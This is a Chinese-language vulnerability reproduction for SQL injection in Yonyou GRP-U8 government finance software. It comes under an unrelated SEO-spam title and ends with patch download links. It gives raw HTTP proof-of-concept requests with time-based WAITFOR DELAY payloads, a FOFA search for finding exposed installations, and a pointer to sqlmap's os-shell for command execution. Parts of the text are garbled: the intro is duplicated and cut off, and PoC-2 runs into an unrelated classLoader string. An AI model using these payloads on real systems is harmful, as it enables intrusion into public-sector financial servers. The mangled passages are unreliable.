延吉市网站建设,无安全警告的浏览器,h5网站建设方案.doc,未备案网站通知0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业#xff0c;基于云计算技术所推出的新一代产品#xff0c;是我国行政事业财务领域最专业的政府财务管理软件。
0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存…0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业基于云计算技术所推出的新一代产品是我国行政事业财务领域最专业的政府财务管理软件。
0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞由于用友GRP-U8未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞进一步利用可造成主机失陷。
0x03 影响范围
用友GRP-U8R10 U8Manager B、C、G 系列产品 20230905
0x04 复现环境
FOFAapp用友-GRP-U8 0x05 漏洞复现
PoC-1
GET /u8qx/slbmbygr.jsp?gsdm1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
延时5秒 Sqlmap验证 PoC-2
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodeduserName;WAITFOR DELAY 0:0:6--class.module.classLoader.DefaultAssertionStatus 延时6秒 利用os-shell命令执行 0x06 修复建议
目前官方已发布更新补丁获取安全补丁方式如下
1. 百度云盘https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码n1xy
2. 用友云盘https://pan.yonyou.com/s/gUWlv8QkSsY密码a61h
下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】
更新用友GRP-U8 Manager产品的2023年10月份日期大于等于均可标准补丁也可以修复此问题。